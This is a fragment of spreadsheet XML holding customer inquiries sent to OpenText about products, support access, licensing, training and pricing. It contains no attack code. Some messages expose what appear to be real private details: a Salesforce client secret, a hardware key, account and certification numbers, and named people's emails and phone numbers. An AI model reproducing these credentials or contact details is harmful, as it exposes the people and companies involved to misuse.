Pascagoula, MS, 39568-0149_x000D_
United States_x000D_
_x000D_
QTY 147 Electronic Maintenance Exceed _x000D_
1000012107(MAINT-EXMPI550700M)_x000D_
_x000D_
_x000D_
I look forward to your reply._x000D_
_x000D_
_x000D_
Devyn Upton_x000D_
Product Management,Strategic Procurement _x000D_
Weirdware_x000D_
SYNNEX Corporation _x000D_
Telephone: 864-349-4272 |   Email: DevynU@synnex.com_x000D_
</t>
  </si>
  <si>
    <t>I wanted to inquire about OpenText Exstream certifications. I am working on opentext platform for around 5 years and I wanted to know that if i do need to take trainings to take the exam?</t>
  </si>
  <si>
    <t>Sales inquiry about e-Discovery product. Please contact as soon as possible.</t>
  </si>
  <si>
    <t>Recherche solution de génération de nos documents client ; soit temps réel (mail html, mail pdf gestion piece jointe, gestion envoi) soit par lot (pour pdf factures)</t>
  </si>
  <si>
    <t xml:space="preserve">Looking for training on APPWORKS. </t>
  </si>
  <si>
    <t xml:space="preserve">We are having trouble with the EDI connection with GXS/OpenText VAN with Delphi/Aptiv._x000D_
Former ISDN Number 02114379360 seems to be out of service. _x000D_
Can you give advice ? </t>
  </si>
  <si>
    <t>I have a customer who uses Rkyv v12 who want to integrate from our product. Do you have any API's</t>
  </si>
  <si>
    <t>Good day,_x000D_
Please can some help. I am trying to open up an attachment in SAP which users OpenText viewer and I keep getting a warning message - Security warning message and I am prompted to save the file which by default saves it as data1 without an extension. I am using window 10. All worked fine until 31 January, no on can open these attachments. However windows &amp; users can open the attachments. Please can you help urgently as our users need to open these attachmnets for payment to customers.</t>
  </si>
  <si>
    <t>I use captiva, however, I have an error associated with licenses._x000D_
How to have Captiva licenses?_x000D_
If you require further information, feel free to contact me</t>
  </si>
  <si>
    <t>We're going to implement a DAM solution in 2019 and are currently in the provider evaluation stage. Would appreciate a short phone call with a local supplier in order to arrange a meeting in our HQ. Thanks and best regards, Max Sommer</t>
  </si>
  <si>
    <t>To whom it may concern,_x000D_
_x000D_
At Gini, we are looking for a solution for information extraction from document images, mainly from German invoices. Would it be possible to test your service, i.e., to receive test credentials for API or web testing solution?_x000D_
Looking forward to hearing from you,_x000D_
Katsiaryna Stalpouskaya</t>
  </si>
  <si>
    <t xml:space="preserve">My clients are having trouble opening the files I send them. </t>
  </si>
  <si>
    <t xml:space="preserve">We would formally invite you to be a Speaker or Delegate or Exhibitor for the upcoming “International Conference on Mechanical &amp; Aerospace Engineering” during June 24-25, 2019 in Tokyo, Japan. Kindly let us know, if you could participate for the conference. _x000D_
	_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">I require access to My Support and whenever I try to access the page, it requests an email confirmation: I have confirmed the email several times. </t>
  </si>
  <si>
    <t>Hi,_x000D_
We have below queries related to the fax coversheet - _x000D_
1. In some of the fax coversheet that is attached from open text as a part of fax, the To field is not populating, could you please tell me to which field it is mapped to?_x000D_
2. To which field is the Company field mapped with? Can we remove it from the coversheet?_x000D_
3. 3.	The fonts within the Body of the notes appear to be different, or maybe it’s the font size that’s different. Can you please provide some insight here on how we can align them?_x000D_
_x000D_
We need assistance from you as soon as possible as this is client facing and client business it getting hampered._x000D_
Please let us know when can we connect._x000D_
Thanks,_x000D_
Neha</t>
  </si>
  <si>
    <t>We are trying to access to the section "Activation/Keys" in My Accounts, but seems we don´t have access and the web ask us to Request a confirmation email, which clicking on it, says that the account was verified successfully, but not really working when we trying to access to the Activation/Keys section. Synlab has a maintenance contract active with OpenText.</t>
  </si>
  <si>
    <t>I applied for a role with yourselves Ref#: 22202 at the end of January but have not heard anything from you.  Can you please provide a progress update?_x000D_
_x000D_
Many thanks</t>
  </si>
  <si>
    <t>Hi,_x000D_
Shreya here from GEP. We are initiating an RFI for a large chemical manufacturer for Enterprise Information Management (EIM) System and would like to connect with you to get information on specific points of contact from your organization, who can help us provide response to the RFI._x000D_
Thanks.</t>
  </si>
  <si>
    <t>Hi,_x000D_
In RightFax database the table “document” and the field call “status”_x000D_
If the status = 8, what that mean?_x000D_
Or if you can provide me the list of status and description.  Thanks</t>
  </si>
  <si>
    <t xml:space="preserve">We are looking at adopting an electronic records management solution and would like to get some pricing options for an appropriate solution._x000D_
</t>
  </si>
  <si>
    <t>Goodmorning,_x000D_
I have downloaded the app from salesforce. How can i start using this to test?_x000D_
_x000D_
Organization: Boat Bike Tours (00D1r000001pXxL)_x000D_
User: Max Meijer (0051r000008LqjW)_x000D_
Package: Exstream for Salesforce (04t6A000002qWkI)_x000D_
_x000D_
And the costumer secret: 61C5C2CB9F7D93A9697FA2BB9A547A0B53284549A820743DA6A88D3DE5813C05_x000D_
_x000D_
Let me know what i need to do. _x000D_
Kind regards_x000D_
Max Meijer</t>
  </si>
  <si>
    <t>aprendo un file .pdf in overlay editor, segnala un errore: _x000D_
filed to read file - external filter failed to open file</t>
  </si>
  <si>
    <t>I need a password reset.</t>
  </si>
  <si>
    <t>When we creating L01 or L0X1, from Encase even though the Compression has been turned off it is still compressing the end output of the L01s when we creating the spanned L01s._x000D_
Test data contained all the User Files, pst and NSF._x000D_
Example : Raw Data size - 20 GB._x000D_
When spanned L01s created we getting size - 15GB without Compression Enabled._x000D_
Can we please have some justification on why this scenario is happening.</t>
  </si>
  <si>
    <t>Hi, _x000D_
_x000D_
I am trying to learn more about OpenText's suite of products. I am interested in Document Management (ECM) and Managed File Transfer functionality mainly._x000D_
_x000D_
I'd love to connect tomorrow if possible. _x000D_
_x000D_
Best,_x000D_
Tyler</t>
  </si>
  <si>
    <t xml:space="preserve">i have a user in my company that soecifically needs Actuate 10. ereport designer pro 10 i think it is also called. we are tryjng to install it on a new computer but we do not have the install files any longer. where can we download the install? also he will need version 11. can they co-exist? or we can wait until the issues with 11 are resolved and just put 10 on there for now. please help. </t>
  </si>
  <si>
    <t>I'd like to understand your product offerings for laptop legal holds.</t>
  </si>
  <si>
    <t>Good Morning_x000D_
_x000D_
We are specifically looking for an OCR engine that will allow us to convert Vendor Invoices into digital format for inputting into our ERP SAP platform._x000D_
_x000D_
We are specifically looking for an OCR engine that can handle Asian languages, including Chinese, Korean, Arabic, Thai, Vietnamese etc</t>
  </si>
  <si>
    <t>Id like to know more about your EDI services</t>
  </si>
  <si>
    <t>Hi Guys,_x000D_
I am trying to get to the Support area to look at a source code correction (KB470927) but I am not able to access to the Support Area._x000D_
Could you please help to give me the required access?_x000D_
Regards,_x000D_
Kevin.</t>
  </si>
  <si>
    <t>We are trying to install MFA on our SharePoint servers right now and we have an issue with Brava. I need to talk to someone who can help us to figure out the issue. We need someone to tell us what to check or have information what must be verified when you want to install MFA (Multi-Factor Authentification)</t>
  </si>
  <si>
    <t>I am interested in your OpenText Rights Management product and would like to have a demo._x000D_
_x000D_
thx_x000D_
Nad</t>
  </si>
  <si>
    <t>Hello team!_x000D_
My name is Alexander, SYSSOFT company. We are a software reseller from Russia. We have a prospect customer who is interrested in EnCase Forensic. The customer is Sberbank. Can we resell your software to our customer? If so, what are the conditions?_x000D_
_x000D_
Best regards,_x000D_
Alex</t>
  </si>
  <si>
    <t xml:space="preserve">Hey,_x000D_
My name is Ryan Smith and I work at “OgreLogic Solutions LLC”, based out of Austin, Texas._x000D_
This message is in regard to offer you with white label partnership with our firm since we are in the same line of business. _x000D_
_x000D_
This would greatly help in creating new opportunities, new business relationships and experience enormous growth in our industry.   _x000D_
_x000D_
We’ve accomplished a lot over the last 3 years and our credibility lies in the work we deliver. 500 happy clients can vouch for us, and so will you when you become a part of our family. What we wish to do for you, is to chat and understand your financial goals and then suggest which business solution fits you best. _x000D_
_x000D_
Hope this information proves to be useful for you and your business, and if you have any queries please feel free to reach out, you have my email address._x000D_
_x000D_
_x000D_
Look forward to hearing back._x000D_
</t>
  </si>
  <si>
    <t>Information and pricing on RightFax solution. Currently using on premise RightFax solution and interested in a cloud solution that integrates with Office 365.</t>
  </si>
  <si>
    <t xml:space="preserve">Sir/Ma’am,_x000D_
_x000D_
We’re looking for full specs on any software updates and toolkit updates for current and coming releases. Emphasis on mobile devices. If you feel it’s in our mutual interest, please connect me with Senior Corporate Procurement, Technical and Executive personnel as you see fit. This is part of a Market Survey for standing clients to enable decisions on volume purchases. I cannot disclose our clients, but treat them as Law Enforcement/Homeland Security/Intelligence Community, etc. Primary considerations include but are not limited to: Pricing, Sustainability, Operations and Maintenance, Training, and Modularity/Granularity of products. Please respond as soon as possible._x000D_
</t>
  </si>
  <si>
    <t>Need information on document management</t>
  </si>
  <si>
    <t xml:space="preserve">Need to obtain quote for BizLink 4.0, SecureLink 4.0, and possibly professional services.  </t>
  </si>
  <si>
    <t>Last year, I purchased the EnCe Bootcamp I have taken the first two courses...how do I register for the last course, EnCE prep without paying additional money? Thank you!</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
I work for CPS Energy in IT Department._x000D_
Our SAP ERP system is around 6TB._x000D_
We are looking at archiving data ; which is older than 7 years; for reducing foot print._x000D_
_x000D_
a) Please confirm if you are certified vendor from SAP ; for helping with SAP Archiving ?_x000D_
b) We would like to know the costs involved _x000D_
c)  what is the project duration ?_x000D_
d) Do we need separate hardware ?_x000D_
We have SBX/DEV/QAS/PRD for ECC.._x000D_
e) Is  there a cloud solution for open text archiving ?_x000D_
f) Are you certified for SAP ECC 6.0 and as well S4HANA once we migrate to cloud ? _x000D_
_x000D_
we have in-house SAP application Team and Basis Team ; who can help identify the big tables ; rules to for data archiving etc_x000D_
_x000D_
Would like to have initial conversation to have a dialog and involve my management to keep the ball rolling .._x000D_
_x000D_
Regards,_x000D_
Gokul</t>
  </si>
  <si>
    <t>I wanted to register for the course 3-0191 Content Server System Administration I v16.2 on March 18. There was a problem with the website hanging and it shows that I am registered 3 times for the course. Can you please delete 2 of them?_x000D_
_x000D_
Regards,_x000D_
Adli Abushaban</t>
  </si>
  <si>
    <t>We have an issue in Barava unable to launch PDF in Barava, we need to fix it ASAP</t>
  </si>
  <si>
    <t>We would like a demonstration of eDocs for our law firm.  Before you give a sales rep our name and number, may we please see the choices for our local area?  THanks.</t>
  </si>
  <si>
    <t>I am a project manager in charge of estimating budgets for a project that requires survey data entry. We are wondering if we partnered to use teleform, how much would the total cost of entering 50,000 paper surveys into electronic data (fees, equipment costs, software costs, etc.)?</t>
  </si>
  <si>
    <t>Dongle 3002089202_x000D_
_x000D_
Could you please provide me with a link to download the latest software version that was released when our support was active? Also provide a quote for renewal of the dongle._x000D_
_x000D_
Thanks,</t>
  </si>
  <si>
    <t>I am looking to find out more about LearnFlex, and what it offers.</t>
  </si>
  <si>
    <t>I have a support contract and my account continually says need to verify my email address even after it has been done several times.  So I cannot access the support areas I need.</t>
  </si>
  <si>
    <t>I registered an account in February but I couldn't remember the password.  I tried to change the password but the system keeps refusing the password change._x000D_
_x000D_
Help.</t>
  </si>
  <si>
    <t>I would like to confirm that I am listed as the point of contact for my agency's account with OpenText.  At this time, I am the sole EnCase user for my agency._x000D_
_x000D_
Thanks</t>
  </si>
  <si>
    <t>Hello open text Team, _x000D_
I'm Sahra Lee from CID Resources, Inc and wanted to reach you out asking about the VAN transition. we are currently using the GXS VAN and researching that if it's possible to move the GXS VAN to Liaison Exchange network-VAN. if so, would you please advise how it will cost for the conversion and if it's able to move all the transmission histories and interconnection setup in GXS to the Liaison VAN?_x000D_
Please forward this to the appropriate person._x000D_
_x000D_
Best regards,_x000D_
Sahra Lee</t>
  </si>
  <si>
    <t>Looking for licensing options.  Company recently was acquired and we need to port our AS400 iSeries applications to a hosted environment off of existing platform</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
we are family based logistics company in Europe, we are in logistics for over 12 years, please could you tell us how is Covisint platform working? _x000D_
_x000D_
We would like to become a direct supplier in logistics for some companies in Europe such as Mahle, Adient, Brose etc._x000D_
_x000D_
Is there any way to connect with companies and offer them our services?_x000D_
_x000D_
Is your platform free of charge?_x000D_
_x000D_
Thank you very much for your explanations._x000D_
_x000D_
Best regards from ReneTrans.</t>
  </si>
  <si>
    <t>I'm checking on the status of my EnCE certification # 15-0110-3432.</t>
  </si>
  <si>
    <t>Hello,_x000D_
I need to obtain a W9 and a good contact number from your accounts receivable department who maintains our account. If you have any questions please let me know. Thank you!</t>
  </si>
  <si>
    <t xml:space="preserve">We are looking to move our physical fax lines to a digital fax service. </t>
  </si>
  <si>
    <t>I had my support access for my id Srinivas.manchikalapati@novartis.com. OTCS Ticket 408233. Now I get an access denied message. Kindly check and fix it.</t>
  </si>
  <si>
    <t>I was checking to see if we are in your system and do we have support with you guys.</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
I would like to claim some elite points if possible, for attendance by myself and two colleagues to webinar sessions,_x000D_
_x000D_
I'm not sure how to do this but if you let me know which details are necessary and I can send them to you,_x000D_
_x000D_
Regards_x000D_
_x000D_
Jim Godsell</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
My name is Yash Arora, and I am a Grade 12 Co-op student at Richmond Hill High School. I am inquiring about a potential unpaid Co-op position at the Richmond Hill OpenText location, as I noticed a Software Engineering job on your website. I would love to work as an intern/assistant for such a job, and I can be contacted at yash_arora6@hotmail.com. My Cover Letter and Resume can be sent to you as needed._x000D_
_x000D_
Thank you,_x000D_
_x000D_
Yash.</t>
  </si>
  <si>
    <t>Good day,_x000D_
_x000D_
Can I be sent a quotation for 2 persons to complete the DF120 - Foundations in Digital Forensics with EnCase OnDemand Course._x000D_
_x000D_
Regards,_x000D_
_x000D_
Mark</t>
  </si>
  <si>
    <t xml:space="preserve">Looking for work </t>
  </si>
  <si>
    <t>MN has a contract for the fax 2 mail services that will expire. The email I send to my accountmanager Anina Block was undeliverable. Could you please let me know who my new accountmanager is?</t>
  </si>
  <si>
    <t>Hi Team,_x000D_
_x000D_
Good day!_x000D_
_x000D_
In one of our account "Dixons" we are having eNDI product. Could you please help me with below details._x000D_
eNDI current version installed in our system is 4.4_x000D_
_x000D_
a. What is the latest version available?_x000D_
b. When v4.4 went OOS?_x000D_
_x000D_
Regards,_x000D_
Medhashree</t>
  </si>
  <si>
    <t>Dear All,_x000D_
I would like to know if you provide trainings on Communications aiming the Customer Engagement, as I saw on the description of the page "Customer Communications Management". _x000D_
We would prefer to have online sessions, since we are based in Madrid, but before sharing more details I would like to know if you offer this type of service, as well as a quotation, if possible at this stage._x000D_
Thank you in advance and kind regards,_x000D_
Denise</t>
  </si>
  <si>
    <t>I'm unable to access this link _x000D_
ccmsys/v160401/ccmsys-agd/en/html/_manual.htm</t>
  </si>
  <si>
    <t>Sehr geehrte Damen und Herren,_x000D_
_x000D_
wir sind ein kleines Unternehmen mit aktuell 6 Mitarbeitern, welches unter einer enormen Dokumentationslast leidet. Daher sind wir sehr interesseiert an Ihrem DMS-System. Wir arbeiten im biotechnologischen und pharmazeutischen Bereich im GMP-Regulierten Umfeld, daher habe ich einige spezielle Fragen bezüglich Anpassungsmöglichkeiten und / oder schon vorhandenen Modulen. _x000D_
•	Bezüglich der Kosten habe ich eine Frage. Gibt es eine Tabelle aus der wir die Kosten ableiten können oder können Sie mir ein ungefähres Angebot für Implementierung, Schulung und das System zukommen lassen? _x000D_
_x000D_
•	Des Weiteren habe ich gelesen, dass Ihre Software gemäß GDocP arbeitet. Auch habe ich gelesen, dass alle FDA und EU Annex 11 Regularien eingehalten werden. Wie sieht es mit Länderspezifischen Regularien aus? Gibt es hierzu eine Validierungs- bzw. Prüfnachweis? _x000D_
_x000D_
•	Ist das Ausfüllen von Formularen bzw. Checklisten möglich? Die Anwendung, welche mir vorschwebt, ist die Dokumentation und Projektierung von Forschungs- und Entwicklungsprojekten. _x000D_
_x000D_
•	Werden von dem DMS elektronische Signaturen unterstützt bzw. können diese im System erstellt werden und welche technischen Voraussetzungen müssen wir erfüllen? _x000D_
_x000D_
•	Eine weitere Frage bezüglich eines möglichen Barcodes. Wir überlegen zusätzlich zu den Festrechnern auch Tablets einzusetzen. Wird von der Software die Kamera unterstützt mit der Barcodes gelesen werden können um somit eine Zuordnung von Dokumenten zu erleichtern? Ist ein Barcodegenerator für die Dokumente integriert? _x000D_
_x000D_
•	Bezüglich der Datensicherung habe ich die Frage: wie können wir sicherstellen, dass ich wir die Daten noch in 10 Jahren lesen können. Da das DMS-System (nur?) in der Cloud verfügbar ist, welche Möglichkeit der Datensicherung ist vorhanden? _x000D_
_x000D_
•	Sie haben auch Kunden aus dem Life Science Bereich. Gibt es Module, welche den Laboralltag mit abbilden? _x000D_
_x000D_
•	Vorerst letzte Frage, gilt dem Scannen von Dokumenten. Ich nutze Privat ei</t>
  </si>
  <si>
    <t>We're conducting an RFI of providers on behalf of a major global brand and looking for an email for someone in your team who'd be best placed to field a RFI - could you please share one?</t>
  </si>
  <si>
    <t>Conference</t>
  </si>
  <si>
    <t xml:space="preserve">I would like to understand your solution to implement in our company to replace existing RightFax solution </t>
  </si>
  <si>
    <t>Bonjour,_x000D_
Nous sommes à la recherche d'une application permettant de transférer les données des applications qualité des constructeurs dans notre application qualité interne. _x000D_
Salutations</t>
  </si>
  <si>
    <t xml:space="preserve">Good morning,_x000D_
_x000D_
I am enquiring as to whether your fax services support a software called T-38 Protocol?_x000D_
_x000D_
Kind regards,_x000D_
_x000D_
Aameenah Banks_x000D_
</t>
  </si>
  <si>
    <t>I am looking for Documentum D2 training, can you help me to know right contact details to discuss in detail? Thanks</t>
  </si>
  <si>
    <t>Sehr geehrte Damen und Herren,_x000D_
_x000D_
Ich bin als freiberuflicher Experte im Bereich EU e-Rechnungsstandard en16931 bei DIN &amp; CEN tätig und möchte mehr über Ihr Produkt "Vendor Invoice Management for SAP Solutions" erfahren._x000D_
_x000D_
Konkret soll das Vendor Invoice Management powered by OpenText im Unternehmen eingeführt werden und ich bei einer Kick-Off Veranstaltung beim Kunden eine Präsentation über das Produkt gehalten werden. Hätten Sie dafür bereits Vorlagen, auf denen ich meine Präsentation stützen kann?_x000D_
_x000D_
Ich nehme an Ihre Anwendung kann die folgenden Anforderungen erfüllen, wie würden Sie vorschlagen bereite ich mich darauf am effizientesten vor?_x000D_
_x000D_
Die Anforderungen des Kunden sind die üblichen:_x000D_
- Weitestgehende automatisierte Verarbeitung – Prüfung und Vervollständigung, Abweichungs- /Ausnahmebehandlung, Freigabe und Buchung soll Ziel des Projektes sein _x000D_
- Rechnungsvalidierung, Prüfung und Vervollständigung inclusive Workflows muss als Zwischenschritt gecustomized werden. _x000D_
- Automatisiertes Weiterleiten von Ausnahmefällen zur Prüfung und Freigabe als Workflow. _x000D_
- Eskalations- und Reportingfunktionalitäten sollen im Projekt besprochen werden. _x000D_
- Möglichkeit die Weiterleitung und Zuordnung von Rechnungen über definierte Workflow-Schritte - basierend auf Benutzerrollen, Berechtigungen und vordefinierten Zeitplänen - zu automatisieren_x000D_
- Automatische Klassifizierung von Rechnungen. Unklare Rechnungen sollen automatisch für weitere Aktionen als gesperrt oder geparkt klassifiziert werden. Diese Klassifizierungen steuern den weiteren Prozess und lösen verschiedene Stufen von Eskalations-Benachrichtigungen aus. _x000D_
- Abhängig von der Klassifikation sollen unklare Rechnungen entsprechend festgelegter Workflows weitergeleitet werden, um evtl. Freigaben oder nächste Prozessschritte anzustoßen. _x000D_
- Möglichkeit der Statusüberwachung zur Laufzeit und Benachrichtigung der Lieferanten bei Unklarheiten. _x000D_
- Rechnungsinformationen sind über Anwendungen, Content und Historie über</t>
  </si>
  <si>
    <t xml:space="preserve">I 'm looking for DMS solution. I 'm an SI and I do document scanning. _x000D_
_x000D_
I need an overall solution with DMS which can integrate with his Hospital information management portal to quote to my hospital client._x000D_
_x000D_
Please let me know if you can support me. My location is Hyderabad, India_x000D_
</t>
  </si>
  <si>
    <t>Hello,_x000D_
In 2014 we bought 40 TXL - Current floating licenses of Brava Desktop with 1 year support._x000D_
We are now interested in upgrading to the latest version of Brava especially because we have a lot of problems with the license server, who is crashing regularly._x000D_
The question is: What would be the cost for that (including annual support)</t>
  </si>
  <si>
    <t xml:space="preserve">i have downloaded free DWG viewer, and when trying to operate it, it says invalid license, sending me for update on this page._x000D_
(cannot put link here, but its "OpenText Brava! for Content Suite"_x000D_
_x000D_
how to proceed from here?_x000D_
thanks in advance, _x000D_
</t>
  </si>
  <si>
    <t>Dear Opentext,_x000D_
_x000D_
Could you please engaged one person from consulting who can help me migrate our on-prem dazel output server to azure cloud . We need technical scope of possibilities in migration our dazel application. I can be available to my mentioned contact number for further info._x000D_
_x000D_
Thanks &amp; Regards_x000D_
Chandan Medhi</t>
  </si>
  <si>
    <t>Hi Soltius team,_x000D_
_x000D_
would like to know better on OpenText solution and its capabilities to answer the needs of Enterprise Content Management._x000D_
therefore would it possible if it is relevant to our expectation above,to invite Soltius team to our office for short presentation and discussion._x000D_
_x000D_
Thank You._x000D_
Teuku.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi _x000D_
  	_x000D_
I went through your website and we would love to_x000D_
  _x000D_
collabarte with your team on a project._x000D_
</t>
  </si>
  <si>
    <t>I cannot access your website. I am a licensed user of encase software. I can't download the current software. The most complex site within forensic software websites belongs to you. can I send url to download current software? Thanks.</t>
  </si>
  <si>
    <t>Hi OpenText,_x000D_
Consenso Consulting is a medium sized SAP consulting company located in Germany with a strong focus on the retail market. To round up our internal demo systems we would like to expand out P2P-scenario with a proper Invoice Management solution. _x000D_
_x000D_
Now we are looking for the possibility to set up an internal demo system for OpenText Vendor Invoice Management. We would like to aquire a demo licence for Vendor Invoice Management and ICC/BCC. _x000D_
_x000D_
A few existing clients are planning the migration from R3 to S4. We see the strong opportunity to replace existing Invoice Management Solutions like SER or customer developed solutions by Vendor Invoice Management. However, at the moment we do not see that we can already apply for a proper partnership with OpenText._x000D_
_x000D_
How can we proceed best?_x000D_
_x000D_
Thanks,_x000D_
Christian Wythe</t>
  </si>
  <si>
    <t>We've been trying to renew our EnCase licensens for almost two years, without luck thus far. We've also tried to get hold on a contact person, in an effort to move this on, also with no luck thus far. I called your UK office today (feb. 12th, 9:30 am) and remained for 10 minutes on the line, without getting a name of a person to speak to. I was just put on someone's voice box to leave a message. We'll never be able to follow up that, lacking a name and a number to touch base with later._x000D_
_x000D_
We really need to get this sorted, and would appreciate sincere efforts in solving this rather soon.</t>
  </si>
  <si>
    <t>Could you please let us know Singapore PIC email address?_x000D_
We would like to contact in order to request for proposal of our planning system project relating Customer Communication Management.</t>
  </si>
  <si>
    <t xml:space="preserve">Sehr geehrte Damen und Herren,_x000D_
_x000D_
ich suche nach einer Firma die Systemwartungen/Wartungsarbeiten durchführen, die Gupta-Entwickler zu verfügung stellen. Falls Sie in dem Bereich Entwickler haben sollten sprechen Sie auch Deutsch?_x000D_
Es würde von Vorteil sein, wenn die Firma im Bereich Forstwirtschaftlich und Umwelt erfahrung hätte._x000D_
Ich würde auch gerne wissen, ob Sie einen Sitz in Deutschland haben._x000D_
_x000D_
Falls Sie in dem Bereich Erfahrung haben als Firma, bitte ich Sie mir Informationen weiterzuleiten._x000D_
_x000D_
Mit freundlichen Grüßen_x000D_
Delikaya_x000D_
</t>
  </si>
  <si>
    <t>Vielen dank für die Umschreibung der Lizenz, allerdings können wir nach einspielen der Lizenz keine DWG Dateien öffnen._x000D_
Dabei haben wir die Lizenz gekauft die dafür geeignet ist._x000D_
_x000D_
# CommonHardwareKey: 30-E1-71-7A-B2-27_x000D_
# CommonCustomerNumber: 466342</t>
  </si>
  <si>
    <t xml:space="preserve">Hi Officer-in-charge,_x000D_
_x000D_
This is Lewis Low, Group IT Manager from Miclyn Express Offshore Pte Ltd, we have implemented OpenText VIM system version 7.00 in year 2015, we would like to perform version upgrade from version 7.00 to version 7.50, we are getting SAP basis consultant to download and perform system patch, we are unable to do so as it is require to enter a password before we can import them, can you please advise are you able to provide password for us to import and patch ?_x000D_
_x000D_
Component : OTEXBASO_x000D_
Release : 1620_700_x000D_
Package : SAPK-307COINOTEXBASO_x000D_
Password : ?_x000D_
_x000D_
Component : OTEXTVIM_x000D_
Release : 750_x000D_
Package : SAPK-750COINOTEXVIM_x000D_
Password : ?_x000D_
_x000D_
Please assist, thank you._x000D_
_x000D_
Best Regards_x000D_
Lewis Low_x000D_
_x000D_
 </t>
  </si>
  <si>
    <t>Need to know the package/module to be purchased to add the feature of Report generation to OTMM 10.5</t>
  </si>
  <si>
    <t>Dear Team,_x000D_
_x000D_
With my account, I am unable to view or access KC ...details._x000D_
_x000D_
Please, can you look into my account and do the needful._x000D_
_x000D_
_x000D_
Regards,_x000D_
Manjunath.B</t>
  </si>
  <si>
    <t>I need to upgrade Centura / Gupta 2.1 to 7.1 but when i open the APL file it says "Migrating from 4.2 and earlier not supported for TD 7.1. use an earlier version first._x000D_
_x000D_
Could you send me the link of the older version of TD?</t>
  </si>
  <si>
    <t>Hi Opentext,_x000D_
_x000D_
We are currently using Opentext platform B2B for ALDI Australia._x000D_
_x000D_
Recently we received a request from Coles Supermarket Australia to move to B2B platform. We would like to know if you can assist in this matter? If you can, where we should start?_x000D_
_x000D_
Thank you and regards,_x000D_
_x000D_
Tristan</t>
  </si>
  <si>
    <t xml:space="preserve">We need to update the users on this account. Please let me know how we can update this. </t>
  </si>
  <si>
    <t>We accidentally let our support contract lapse. I'd like to get a new invoice to renew it. I believe it expired in December of 2018</t>
  </si>
  <si>
    <t>Why are you billing my credit card?_x000D_
I did not sign up for anything.</t>
  </si>
  <si>
    <t xml:space="preserve">We are moving to Epic and need to Archive our Legacy Systems. </t>
  </si>
  <si>
    <t xml:space="preserve">my support account states I don't have access_x000D_
</t>
  </si>
  <si>
    <t>Can I get a quote for On Demand 'DF120 - Foundations in Digital Forensics with EnCase OnDemand' please._x000D_
_x000D_
Thank You</t>
  </si>
  <si>
    <t>Everytime I try to log into knowledge center it tells me to confirm/verify my email, which I have multiple times. Please fix this because I would like to be able to access materials and not always have to go through our consultants._x000D_
_x000D_
Thanks,_x000D_
Dennis</t>
  </si>
  <si>
    <t>Does our company have a support contract or how do we gain access to your Knowledgebase regarding issues with RightFax?</t>
  </si>
  <si>
    <t>I'm checking to see if St. Luke's Hospital in Chesterfield, MO has a support contract.</t>
  </si>
  <si>
    <t xml:space="preserve">Good Afternoon, _x000D_
_x000D_
I’m one of the Business Analyst for a project to implement Two Factor Authentication/ Single Sign-On for Church Mutual. _x000D_
Please answer the questions below as it would help us implement Multi-Factor Authentication and Single sign on. _x000D_
_x000D_
•	Do users and admins use their CMXXXX number or their church mutual email id as user name? _x000D_
_x000D_
•	Please validate if all user accounts are managed inside Church Mutual or with the vendor? _x000D_
_x000D_
•	Does the application support any authentication frameworks such as SAML/Oauth/WSFed/OpenID/Custom?_x000D_
_x000D_
•	Is there a cost associated with the implementation?_x000D_
_x000D_
Please provide responses to the above questions. If necessary, I will setup a meeting to clarify the responses._x000D_
For all other question and concerns you can respond back to this email. _x000D_
_x000D_
Sincerely, _x000D_
_x000D_
Kyle Koopman_x000D_
CyberSecurity Contractor_x000D_
Church Mutual Insurance Company_x000D_
3000 Schuster Lane_x000D_
Merrill, WI  54452_x000D_
Phone:  (800) 554-2642, Option 4, Ext. 5248_x000D_
</t>
  </si>
  <si>
    <t>I have not heard back from anyone on how we can access Exstream support.</t>
  </si>
  <si>
    <t>Prezados,_x000D_
Encontrei o site de vocês enquanto buscava por empresas que trabalhem com soluções para Gestão de Conteúdo e Workflow e que possuam representação no Brasil._x000D_
_x000D_
Estou realizando trabalho para a Comissão Nacional de Energia Nuclear (CNEN) no sentido de identificar ferramentas de ECM e Workflow existentes no mercado e  discutir as formas e custos de aquisição.   _x000D_
_x000D_
Inicialmente, tenho a necessidade de avaliar a existência de requisitos definidos pela CNEN em relação as funcionalidades de ECM e da arquitetura da solução demandadas._x000D_
_x000D_
Gostaria de saber se os senhores tem interesse em realizar análise com relação a implementação dos requisitos solicitados pela ferramenta? Caso positivo, posso enviar os requisitos e também estou disponível para contato._x000D_
_x000D_
Saudações,_x000D_
Vanessa Nunes</t>
  </si>
  <si>
    <t xml:space="preserve">Would like to speak with someone about the eDoc Legal solutions.  _x000D_
We are a large hospital system with an in-house legal department in need of email management, document management, some workflow and some calendaring/tasking. </t>
  </si>
  <si>
    <t xml:space="preserve">Current account #: 786169_x000D_
Need support with Primary account for web portal. </t>
  </si>
  <si>
    <t xml:space="preserve">We currently use Teleform in one of our research centers, the Schoembaum Family Center, in the College of Education and Human Ecology at The Ohio State University. _x000D_
_x000D_
The file server and database server are both reaching their end of life. Can you provide me with documentation on how to properly migrate the database and files to a new server?_x000D_
_x000D_
I appreciate the assistance. _x000D_
_x000D_
Thanks!_x000D_
Christine </t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
I tried to email our account manager, Ben Clayman, but received an email back with no forward instructions. _x000D_
_x000D_
We recently placed an order for Encase Investigator licences, reiceved the keys but no invoice. Can someone call on 0207 154 4068._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Dave</t>
  </si>
  <si>
    <t>Hi, I am a OpenText developer. I wanted to know if any trainings happen in Open Text Exstream to teach the 2 step processing, presort and post sort, sorting and Bundling. I have never worked with 2-step, always worked with one-step and taking the pub and deploying in Linux an dproducing output through Soap calls, an dthe produced out is given to Print Vendor. I wanted to see how the 2-step works in real time. Please let me know if these trainings happen anytime? If not please let me know where I can get help with these trainings, I have documentation but interested to watch if some one explains the whole flow._x000D_
_x000D_
Thanks.</t>
  </si>
  <si>
    <t>We have a client using eDocs who would like to setup a customer facing portal to access specific documents. I would like to discuss with someone if this is possible to setup within eDocs and the effort behind it.</t>
  </si>
  <si>
    <t xml:space="preserve">Looking for cloud based system that will allow customers send documents electronically to us for processing.   </t>
  </si>
  <si>
    <t>Plz ik wil zo graag fortnite op mijn telefoon plzzzz</t>
  </si>
  <si>
